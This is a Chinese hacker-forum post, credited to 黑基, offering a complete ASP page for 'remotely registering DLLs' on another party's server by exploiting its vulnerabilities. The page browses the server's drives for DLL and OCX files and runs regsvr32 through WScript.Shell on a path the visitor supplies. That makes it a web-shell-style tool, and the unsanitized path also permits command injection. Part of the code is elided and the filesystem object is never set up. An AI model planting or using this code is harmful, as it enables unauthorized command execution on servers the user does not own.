利用对方服务器漏洞远程注册DLL的脚本

猪猪

信息来源：黑基
　
　我和朋友一起下载了一个相同的组件，苦于无法注册而没用，但最近我发现他在使用这个组件，显然是已经注册了，好奇怪，他是怎么注册的呢？我问他他不说。

其实，我们在ASP中，是有捷径远程注册DLL的，但需要对方服务器漏洞的"配合"（什么漏洞？我可什么都没说啊，自己看）。试试下面的代码，或许侥幸成功呢：

1. <% Response.Buffer = True %>
   
2. <% Server.ScriptTimeout = 500
   
3. Dim frmFolderPath, frmFilePath
   
4. 
   
5. frmFolderPath = Request.Form("frmFolderPath")
   
6. frmFilePath = Request.Form("frmDllPath")
   
7. frmMethod = Request.Form("frmMethod")
   
8. btnREG = Request.Form("btnREG")
   
9. %>
   
10. 
    
11. <HTML>
    
12. <HEAD>
    
13. <TITLE>精彩春风之远程注册DLL</TITLE>
    
14. <STYLE TYPE="TEXT/CSS">
    
15. .Legend {FONT-FAMILY: veranda; FONT-SIZE: 14px; FONT-WEIGHT: bold; COLOR: blue}
    
16. .FS {FONT-FAMILY: veranda; FONT-SIZE: 12px; BORDER-WIDTH: 4px; BORDER-COLOR: green;
    
17.   MARGIN-LEFT:2px; MARGIN-RIGHT:2px}
    
18. TD {MARGIN-LEFT:6px; MARGIN-RIGHT:6px; PADDING-LEFT:12px; PADDING-RIGHT:12px}
    
19. </STYLE>
    
20. </HEAD>
    
21. 
    
22. <BODY>
    
23. <FORM NAME="regForm" METHOD="POST">
    
24. <TABLE BORDER=0 CELLSPACING=6 CELLPADDING=6 MARGINWIDTH=6>
    
25. <TR>
    
26. <TD VALIGN=TOP>
    
27. <FIELDSET ID=FS1 NAME=FS1 CLASS=FS>
    
28. <LEGEND CLASS=Legend>注册DLL</LEGEND>
    
29. 敲入到DLL目录的路径
    
30. 
    
31. <INPUT TYPE=TEXT NAME="frmFolderPath" VALUE="<%=frmFolderPath%>">
    
32. 
    
33. <INPUT TYPE=SUBMIT NAME=btnFileList VALUE="创建文件列表">
    
34. 
    
35. <%
    
36. IF Request.Form("btnFileList") <> "" OR btnREG <> "" Then
    
37.   Set RegisterFiles = New clsRegister
    
38.     RegisterFiles.EchoB("Select File")
    
39.     Call RegisterFiles.init(frmFolderPath)
    
40.     RegisterFiles.EchoB("
    
41. <INPUT TYPE=SUBMIT NAME=btnREG VALUE=" & Chr(34) _
    
42. & "REG/UNREG" & Chr(34) & ">")
    
43.   IF Request.Form("btnREG") <> "" Then
    
44.     Call RegisterFiles.Register(frmFilePath, frmMethod)
    
45.   End IF
    
46.   Set RegisterFiles = Nothing
    
47. End IF
    
48. %>
    
49. </FIELDSET>
    
50. </TD>
    
51. </TR>
    
52. </TABLE>
    
53. </FORM>
    
54. </BODY>
    
55. </HTML>
    
56. <%
    
57. Class clsRegister
    
58. 
    
59. Private m_oFS
    
60. 
    
61. Public Property Let oFS(objOFS)
    
62. m_oFS = objOFS
    
63. End Property
    
64. ......
    
65. Sub init(strRoot) 'Root to Search (c:, d:, e:)
    
66. Dim oDrive, oRootDir
    
67. IF oFS.FolderExists(strRoot) Then
    
68. IF Len(strRoot) < 3 Then 'Must Be a Drive
    
69. Set oDrive = oFS.GetDrive(strRoot)
    
70. Set oRootDir = oDrive.RootFolder
    
71. Else
    
72. Set oRootDir = oFS.GetFolder(strRoot)
    
73. End IF
    
74. Else
    
75. EchoB("噢,文件夹( " & strRoot & " )没找到!")
    
76.     Exit Sub
    
77.   End IF
    
78.   setRoot = oRootDir
    
79.   
    
80.   Echo("<SELECT NAME=" & Chr(34) & "frmDllPath" & Chr(34) & ">")
    
81.     Call getAllDlls(oRootDir)
    
82.   EchoB("</SELECT>")
    
83.   BuildOptions
    
84. End Sub
    
85.   
    
86. Sub getAllDlls(oParentFolder)
    
87. Dim oSubFolders, oFile, oFiles
    
88.   Set oSubFolders = oParentFolder.SubFolders
    
89.   Set opFiles = oParentFolder.Files
    
90.   
    
91.   For Each oFile in opFiles
    
92.     IF Right(lCase(oFile.Name), 4) = ".dll" OR Right(lCase(oFile.Name), 4) = ".ocx" Then
    
93.     Echo("<OPTION VALUE=" & Chr(34) & oFile.Path & Chr(34) & ">" _
    
94.     & oFile.Name & "</Option>")
    
95.     End IF
    
96.   Next
    
97.   
    
98.   On Error Resume Next
    
99.   For Each oFolder In oSubFolders 'Iterate All Folders in Drive
    
100.     Set oFiles = oFolder.Files
     
101.     For Each oFile in oFiles
     
102.     IF Right(lCase(oFile.Name), 4) = ".dll" OR Right(lCase(oFile.Name), 4) = ".ocx" Then
     
103.       Echo("<OPTION VALUE=" & Chr(34) & oFile.Path & Chr(34) & ">" _
     
104.       & oFile.Name & "</Option>")
     
105.     End IF
     
106.     Next
     
107.     Call getAllDlls(oFolder)
     
108.   Next
     
109.   On Error GoTo 0
     
110. End Sub
     
111. 
     
112. Sub Register(strFilePath, regMethod)
     
113. Dim theFile, strFile, oShell, exitcode
     
114.   Set theFile = oFS.GetFile(strFilePath)
     
115.   strFile = theFile.Path
     
116. 
     
117.   Set oShell = CreateObject ("WScript.Shell")
     
118. 
     
119.   IF regMethod = "REG" Then 'Register
     
120.     oShell.Run "c:\WINNT\system32\regsvr32.exe /s " & strFile, 0, False
     
121.     exitcode = oShell.Run("c:\WINNT\system32\regsvr32.exe /s " & strFile, 0, False)
     
122.     EchoB("regsvr32.exe exitcode = " & exitcode)
     
123.   Else 'unRegister
     
124.     oShell.Run "c:\WINNT\system32\regsvr32.exe /u/s " & strFile, 0, False
     
125.     exitcode = oShell.Run("c:\WINNT\system32\regsvr32.exe /u/s " & strFile, 0, False)
     
126.     EchoB("regsvr32.exe exitcode = " & exitcode)
     
127.   End IF
     
128.   
     
129.   Cleanup oShell
     
130. End Sub
     
131.   
     
132. Sub BuildOptions
     
133.   EchoB("Register: <INPUT TYPE=RADIO NAME=frmMethod VALUE=REG CHECKED>")
     
134.   EchoB("unRegister: <INPUT TYPE=RADIO NAME=frmMethod VALUE=UNREG>")
     
135. End Sub
     
136.   
     
137. Function Echo(str)
     
138.   Echo = Response.Write(str & vbCrLf)
     
139. End Function
     
140.   
     
141. Function EchoB(str)
     
142.   EchoB = Response.Write(str & "
     
143. " & vbCrLf)
     
144. End Function
     
145.   
     
146. Sub Cleanup(obj)
     
147.   If isObject(obj) Then
     
148.     Set obj = Nothing
     
149.   End IF
     
150. End Sub
     
151.   
     
152. Sub Class_Terminate()
     
153.   Cleanup oFS
     
154. End Sub
     
155. End Class
     
156. %>

复制代码